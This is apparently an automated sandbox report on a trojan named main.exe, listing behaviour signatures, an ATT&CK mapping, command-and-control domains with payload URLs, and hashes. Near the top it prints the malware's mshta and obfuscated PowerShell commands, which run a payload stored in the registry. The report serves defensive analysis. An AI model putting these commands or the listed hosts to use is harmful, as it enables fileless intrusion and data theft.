                Source: main.exe, 00000000.00000002.505973511.0000000000796000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000000.00000002.506263326.00000000007DE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: main.exe, 00000000.00000002.506263326.00000000007DE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW,
                Source: C:\Users\user\Desktop\main.exe | Code function: 0_2_0040134F LoadLibraryA,GetProcAddress | 0_2_0040134F
                Source: unknown | Process created: C:\Windows\System32\mshta.exe c:\windows\system32\mshta.exe" "about:<hta:application><script>w6wy='wscript.shell';resizeto(0,2);eval(new activexobject(w6wy).regread('hkcu\\\software\\appdatalow\\software\\microsoft\\54e80703-a337-a6b8-cdc8-873a517cab0e\\\testlocal'));if(!window.flag)close()</script>
                Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" new-alias -name fuuocwpse -value gp; new-alias -name aedsorw -value iex; aedsorw ([system.text.encoding]::ascii.getstring((fuuocwpse "hkcu:software\appdatalow\software\microsoft\54e80703-a337-a6b8-cdc8-873a517cab0e").urlsreturn))
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\main.exeCode function: NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,0_2_00401493
                Source: C:\Users\user\Desktop\main.exeCode function: 0_2_006D54EC cpuid 0_2_006D54EC
                Source: C:\Users\user\Desktop\main.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00401A49 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,0_2_00401A49
                Source: C:\Users\user\Desktop\main.exeCode function: 0_2_004012B0 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,0_2_004012B0
                Source: C:\Users\user\Desktop\main.exeCode function: 0_2_006D54EC RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,0_2_006D54EC

                Stealing of Sensitive Information

                Source: Yara match, file source: 00000000.00000003.379318249.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, file source: 00000000.00000003.379201744.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, file source: 00000000.00000003.379244595.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, file source: 00000000.00000003.470931903.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, file source: 00000000.00000003.379164621.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, file source: 00000000.00000003.453248169.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, file source: 00000000.00000003.379115531.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, file source: 00000000.00000003.379275340.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, file source: 00000000.00000003.379360683.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, file source: 00000000.00000003.379342148.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, file source: 00000000.00000003.484040297.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, file source: Process Memory Space: main.exe PID: 6012, type: MEMORYSTR
                Source: Yara match, file source: 0.2.main.exe.6d0000.1.unpack, type: UNPACKEDPE
                Source: Yara match, file source: 0.2.main.exe.cb94a0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match, file source: 0.3.main.exe.14294a0.1.unpack, type: UNPACKEDPE
                Source: Yara match, file source: 0.3.main.exe.1455948.2.unpack, type: UNPACKEDPE
                Source: Yara match, file source: 0.3.main.exe.13aa4a0.0.unpack, type: UNPACKEDPE
                Source: Yara match, file source: 0.3.main.exe.1455948.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match, file source: 0.3.main.exe.13aa4a0.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, file source: 0.3.main.exe.14294a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match, file source: 00000000.00000002.506994526.000000000112F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, file source: 00000000.00000002.506557066.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, file source: 00000000.00000003.470843781.0000000001429000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, file source: 00000000.00000003.470798619.00000000013AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                Remote Access Functionality

                Source: Yara match, file source: 00000000.00000003.379318249.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, file source: 00000000.00000003.379201744.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, file source: 00000000.00000003.379244595.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, file source: 00000000.00000003.470931903.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, file source: 00000000.00000003.379164621.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, file source: 00000000.00000003.453248169.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, file source: 00000000.00000003.379115531.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, file source: 00000000.00000003.379275340.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, file source: 00000000.00000003.379360683.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, file source: 00000000.00000003.379342148.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, file source: 00000000.00000003.484040297.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, file source: Process Memory Space: main.exe PID: 6012, type: MEMORYSTR
                Source: Yara match, file source: 0.2.main.exe.6d0000.1.unpack, type: UNPACKEDPE
                Source: Yara match, file source: 0.2.main.exe.cb94a0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match, file source: 0.3.main.exe.14294a0.1.unpack, type: UNPACKEDPE
                Source: Yara match, file source: 0.3.main.exe.1455948.2.unpack, type: UNPACKEDPE
                Source: Yara match, file source: 0.3.main.exe.13aa4a0.0.unpack, type: UNPACKEDPE
                Source: Yara match, file source: 0.3.main.exe.1455948.2.raw.unpack, type: UNPACKEDPE
                Source: Yara match, file source: 0.3.main.exe.13aa4a0.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, file source: 0.3.main.exe.14294a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match, file source: 00000000.00000002.506994526.000000000112F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, file source: 00000000.00000002.506557066.0000000000CB9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, file source: 00000000.00000003.470843781.0000000001429000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, file source: 00000000.00000003.470798619.00000000013AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                MITRE ATT&CK matrix (numbers in parentheses are the count of matching signatures; cells without a number did not match):

                Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                Valid Accounts | Windows Management Instrumentation (2) | Path Interception | Process Injection (11) | Virtualization/Sandbox Evasion (21) | Input Capture (1) | System Time Discovery (1) | Remote Services | Email Collection (1) | Exfiltration Over Other Network Medium | Encrypted Channel (2) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Data Encrypted for Impact (1)
                Default Accounts | Command and Scripting Interpreter (1) | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Process Injection (11) | LSASS Memory | Security Software Discovery (1) | Remote Desktop Protocol | Input Capture (1) | Exfiltration Over Bluetooth | Ingress Tool Transfer (2) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                Domain Accounts | Native API (3) | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information (1) | Security Account Manager | Virtualization/Sandbox Evasion (21) | SMB/Windows Admin Shares | Archive Collected Data (11) | Automated Exfiltration | Non-Application Layer Protocol (2) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Software Packing (2) | NTDS | Process Discovery (2) | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol (12) | SIM Card Swap | Carrier Billing Fraud |
                Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | Application Window Discovery (1) | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
                Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | Account Discovery (1) | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
                External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | System Owner/User Discovery (1) | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
                Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | Remote System Discovery (1) | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |
                Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | File and Directory Discovery (1) | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction |
                Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | System Information Discovery (35) | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | Data Encrypted for Impact | |

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                Behavior Graph (flattened from the graph view): ID: 747122; Sample: main.exe; Start date: 16/11/2022; Architecture: WINDOWS; Score: 100
                • Start: DNS lentaphoto.at; signatures: Snort IDS alert for network traffic; Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; 3 other signatures
                • Start -> main.exe 6 (started); Start -> mshta.exe 19 (started)
                • main.exe -> iujdhsndjfks.ru 134.0.118.203, 49698, 80 AS-REGRU Russian Federation; main.exe -> lentaphoto.at; signatures on main.exe: Writes or reads registry keys via WMI; Writes registry values via WMI
                • mshta.exe -> powershell.exe 15 (started)
                • powershell.exe -> conhost.exe (started)

                Source | Detection | Scanner | Label
                main.exe | 62% | Virustotal |
                main.exe | 100% | Avira | TR/Crypt.XPACK.Gen7
                main.exe | 100% | Joe Sandbox ML |

                No Antivirus matches

                Source | Detection | Scanner | Label
                0.2.main.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen7
                0.0.main.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen7
                0.2.main.exe.6d0000.1.unpack | 100% | Avira | HEUR/AGEN.1245293

                Source | Detection | Scanner | Label
                iujdhsndjfks.ru | 0% | Virustotal |
                lentaphoto.at | 1% | Virustotal |

                Source | Detection | Scanner | Label
                http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
                https://go.micro | 0% | URL Reputation | safe
                https://contoso.com/ | 0% | URL Reputation | safe
                https://contoso.com/License | 0% | URL Reputation | safe
                https://contoso.com/Icon | 0% | URL Reputation | safe
                http://iujdhsndjfks.ru/ | 0% | Avira URL Cloud | safe
                http://iujdhsndjfks.ru/uploaded/j_2B4a8tc2jahOFa/QsOHICIXeKBm7Eu/BNx3p_2F2GoxX0cDqV/bsIcjyFz7/k_2BDS | 0% | Avira URL Cloud | safe
                http://iujdhsndjfks.ru/uploaded/0zAp8Z1aE71wHoG9Fv8_2FN/P5uvIi7Lt1/EUmOwLMnjKYCw_2FE/5zk0aaz4yuo7/QT | 0% | Avira URL Cloud | safe
                http://iujdhsndjfks.ru/uploaded/0zAp8Z1aE71wHoG9Fv8_2FN/P5uvIi7Lt1/EUmOwLMnjKYCw_2FE/5zk0aaz4yuo7/QTL_2FQEnly/Ec4VWBQYtx71qy/L2HNqAA4G4E5jKKRFVoEW/6ZRPruxEfWT04B4X/RInLDZAh2OnshBS/GAJBFuggBWOl74tiGq/C8U0bIGcG/njcGKLS7Hmxx_2FqYkMA/wXBdKE71rJ0_2BRnJ6T/_2FFCjuDuuyiRkDgNc2F1X/OAukSD8RvE3GZ/wJ754QUV/KLEyROfHTWgoSzopEA1Myxw/SpguZOW_2F2nhfCY/8gj9M.pct | 0% | Avira URL Cloud | safe
                http://lentaphoto.at/uploaded/YLQQ1pvNQgsiX0/6uEpUTz0reRtkFusB_2Bb/kfn6D0FsL9WVZQdI/aUDJFCy515UVsdg/ | 0% | Avira URL Cloud | safe
                http://iujdhsndjfks.ru/uploaded/j_2B4a8tc2jahOFa/QsOHICIXeKBm7Eu/BNx3p_2F2GoxX0cDqV/bsIcjyFz7/k_2BDS2eH2WFjOwUKnxF/cxRvetg60qsvZC3x78Y/lD8NfOdFnkiGuhR8EOmhwP/zT8fuhrHfJH2d/Ofv40l9W/oihnf9hyrxXMRyhNEU3WQZX/uHKMLk6j9C/xMwWNaKtBn_2BWbOV/iD6PRhU2TNKW/6JAfLIVGbXa/piHFabYjkWkLuD/5eut_2FYnEz3uc4kygTTM/g0YmfFvzjqwqIpvd/2xgKiml2FkDoBfu/2RWlPv_2/Bhf.pct | 0% | Avira URL Cloud | safe
                http://iujdhsndjfks.ru/uploaded/WyfwvLfSP6ng/qNwqPjDNV2y/OxJbU5TVCmFtCl/_2FmMGc0UP7xWlc4RHHm3/VkwOuHDTa4HSnc69/VTjN3cHS8admcsl/lF9YNNHT37IEBsIIb1/rPNHaRLKA/yV_2FpGJiuj5msF0n5k_/2B4wsxqrXszPC5OOTPn/esejfHBxrg5go2pgH4ag55/PJJdIY_2BXhg2/Jq5vcK1p/UgH0h5yEg5hXvdYJIEh70Vq/TQwvIFJaVN/s_2BVc_2FBWfsAcv7/_2BTZLbFDlWX/SnOSHCR0HAx/WLEPxneCpL/KSqopsC3x9/C.pct | 0% | Avira URL Cloud | safe
                http://iujdhsndjfks.ru/uploaded/WyfwvLfSP6ng/qNwqPjDNV2y/OxJbU5TVCmFtCl/_2FmMGc0UP7xWlc4RHHm3/VkwOuH | 0% | Avira URL Cloud | safe
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                iujdhsndjfks.ru | 134.0.118.203 | true | true | | unknown
                lentaphoto.at | unknown | unknown | true | | unknown

                Name | Malicious | Antivirus Detection | Reputation
                http://iujdhsndjfks.ru/uploaded/0zAp8Z1aE71wHoG9Fv8_2FN/P5uvIi7Lt1/EUmOwLMnjKYCw_2FE/5zk0aaz4yuo7/QTL_2FQEnly/Ec4VWBQYtx71qy/L2HNqAA4G4E5jKKRFVoEW/6ZRPruxEfWT04B4X/RInLDZAh2OnshBS/GAJBFuggBWOl74tiGq/C8U0bIGcG/njcGKLS7Hmxx_2FqYkMA/wXBdKE71rJ0_2BRnJ6T/_2FFCjuDuuyiRkDgNc2F1X/OAukSD8RvE3GZ/wJ754QUV/KLEyROfHTWgoSzopEA1Myxw/SpguZOW_2F2nhfCY/8gj9M.pct | true | Avira URL Cloud: safe | unknown
                http://iujdhsndjfks.ru/uploaded/WyfwvLfSP6ng/qNwqPjDNV2y/OxJbU5TVCmFtCl/_2FmMGc0UP7xWlc4RHHm3/VkwOuHDTa4HSnc69/VTjN3cHS8admcsl/lF9YNNHT37IEBsIIb1/rPNHaRLKA/yV_2FpGJiuj5msF0n5k_/2B4wsxqrXszPC5OOTPn/esejfHBxrg5go2pgH4ag55/PJJdIY_2BXhg2/Jq5vcK1p/UgH0h5yEg5hXvdYJIEh70Vq/TQwvIFJaVN/s_2BVc_2FBWfsAcv7/_2BTZLbFDlWX/SnOSHCR0HAx/WLEPxneCpL/KSqopsC3x9/C.pct | true | Avira URL Cloud: safe | unknown
                http://iujdhsndjfks.ru/uploaded/j_2B4a8tc2jahOFa/QsOHICIXeKBm7Eu/BNx3p_2F2GoxX0cDqV/bsIcjyFz7/k_2BDS2eH2WFjOwUKnxF/cxRvetg60qsvZC3x78Y/lD8NfOdFnkiGuhR8EOmhwP/zT8fuhrHfJH2d/Ofv40l9W/oihnf9hyrxXMRyhNEU3WQZX/uHKMLk6j9C/xMwWNaKtBn_2BWbOV/iD6PRhU2TNKW/6JAfLIVGbXa/piHFabYjkWkLuD/5eut_2FYnEz3uc4kygTTM/g0YmfFvzjqwqIpvd/2xgKiml2FkDoBfu/2RWlPv_2/Bhf.pct | true | Avira URL Cloud: safe | unknown
                Name | Source | Malicious | Antivirus Detection | Reputation
                http://iujdhsndjfks.ru/ | main.exe, 00000000.00000002.506263326.00000000007DE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                http://nuget.org/NuGet.exe | powershell.exe, 0000000F.00000002.526537629.00000265B8118000.00000004.00000800.00020000.00000000.sdmp | false | | high
                http://pesterbdd.com/images/Pester.png | powershell.exe, 0000000F.00000002.509703365.00000265A8452000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.528303441.00000265C0820000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                http://iujdhsndjfks.ru/uploaded/0zAp8Z1aE71wHoG9Fv8_2FN/P5uvIi7Lt1/EUmOwLMnjKYCw_2FE/5zk0aaz4yuo7/QT | main.exe, 00000000.00000002.506263326.00000000007DE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000000F.00000002.509703365.00000265A8452000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.528303441.00000265C0820000.00000004.00000020.00020000.00000000.sdmp | false | | high
                https://go.micro | powershell.exe, 0000000F.00000002.524619669.00000265A9BE3000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                http://iujdhsndjfks.ru/uploaded/j_2B4a8tc2jahOFa/QsOHICIXeKBm7Eu/BNx3p_2F2GoxX0cDqV/bsIcjyFz7/k_2BDS | main.exe, 00000000.00000002.506263326.00000000007DE000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                https://contoso.com/ | powershell.exe, 0000000F.00000002.526537629.00000265B8118000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                https://nuget.org/nuget.exe | powershell.exe, 0000000F.00000002.526537629.00000265B8118000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://contoso.com/License | powershell.exe, 0000000F.00000002.526537629.00000265B8118000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                https://contoso.com/Icon | powershell.exe, 0000000F.00000002.526537629.00000265B8118000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                http://lentaphoto.at/uploaded/YLQQ1pvNQgsiX0/6uEpUTz0reRtkFusB_2Bb/kfn6D0FsL9WVZQdI/aUDJFCy515UVsdg/ | main.exe, 00000000.00000002.505973511.0000000000796000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 0000000F.00000002.508025334.00000265A80B1000.00000004.00000800.00020000.00000000.sdmp | false | | high
                https://github.com/Pester/Pester | powershell.exe, 0000000F.00000002.509703365.00000265A8452000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.528303441.00000265C0820000.00000004.00000020.00020000.00000000.sdmp | false | | high
                http://iujdhsndjfks.ru/uploaded/WyfwvLfSP6ng/qNwqPjDNV2y/OxJbU5TVCmFtCl/_2FmMGc0UP7xWlc4RHHm3/VkwOuH | main.exe, 00000000.00000002.505973511.0000000000796000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                IP | Domain | Country | ASN | ASN Name | Malicious
                134.0.118.203 | iujdhsndjfks.ru | Russian Federation | 197695 | AS-REGRU | true
                          Joe Sandbox Version:36.0.0 Rainbow Opal
                          Analysis ID:747122
                          Start date and time:2022-11-16 02:12:09 +01:00
                          Joe Sandbox Product:CloudBasic
                          Overall analysis duration:0h 5m 16s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Sample file name:main.exe
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Number of new started processes analysed: 17
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • HDC enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal100.troj.winEXE@5/2@3/1
                          EGA Information:
                          • Successful, ratio: 33.3%
                          HDC Information:
                          • Successful, ratio: 45.9% (good quality ratio 44.3%)
                          • Quality average: 83.5%
                          • Quality standard deviation: 25.8%
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 63
                          • Number of non-executed functions: 23
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                          • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ocsp.digicert.com, ctldl.windowsupdate.com
                • Execution Graph export aborted for target mshta.exe, PID 2388 because there are no executed functions
                • Execution Graph export aborted for target powershell.exe, PID 2620 because it is empty
                • Not all processes were analyzed, report is missing behavior information
                          • Report size getting too big, too many NtOpenKeyEx calls found.
                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                          • Report size getting too big, too many NtQueryValueKey calls found.
                Time | Type | Description
                02:15:01 | API Interceptor | 17x Sleep call for process: powershell.exe modified
                Match | Associated Sample Name / URL | Detection | Context
                AS-REGRU | Requisition Order.exe | malicious | 194.58.112.174
                AS-REGRU | EtmrDdNaeb.exe | malicious | 194.87.219.202
                AS-REGRU | Snedkerlims.exe | malicious | 194.58.112.174
                AS-REGRU | fCsRo7nIN9.exe | malicious | 37.140.192.211
                AS-REGRU | DB_aabggiecggch0x0937.exe | malicious | 31.31.196.3
                AS-REGRU | differentialkvotienternes.exe | malicious | 194.58.112.174
                AS-REGRU | DHL-INV-MVU.exe | malicious | 194.58.112.174
                AS-REGRU | cqu7x.exe | malicious | 37.140.192.158
                AS-REGRU | bin.exe | malicious | 31.31.198.156
                AS-REGRU | PO#KS1143112022.exe | malicious | 31.31.196.3
                AS-REGRU | Styringsgrupper.exe | malicious | 194.58.112.174
                AS-REGRU | Wv29MuO4Cb.exe | malicious | 31.31.196.3
                AS-REGRU | npLfeqK4z7.exe | malicious | 37.140.192.211
                AS-REGRU | RcJ0oosUbi.exe | malicious | 194.87.216.139
                AS-REGRU | http://monteplo24.jelastic.regruhosting.ru/m=tocas@netcabo.pt/&data=05%7C01%7C%7C9f7179bf17c64db4a9c608dabf159c8a%7C10338048193a4298abea3596ae88b05e%7C1%7C0%7C638032397061965658%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0=%7C2000%7C%7C%7C&sdata=4u1Sq9nsCPgWNr7CI0fxOkQvKQ0f/+pqMpUSCfRSAUs=&reserved=0 | malicious | 151.248.124.254
                AS-REGRU | iT8gPVC4TC.exe | malicious | 37.140.192.211
                AS-REGRU | 545187-scripttodo.ps1 | malicious | 194.67.119.190
                AS-REGRU | dvswiftsend_921101134513_932907123939.xls | malicious | 194.87.231.59
                AS-REGRU | ADNOC97571784.exe | malicious | 194.58.112.174
                AS-REGRU | 07aTSiH01G.exe | malicious | 194.58.112.174
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Reputation: high, very likely benign file
Preview: 1
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Reputation: high, very likely benign file
Preview: 1
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.5154778279802725
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: main.exe
File size: 37888
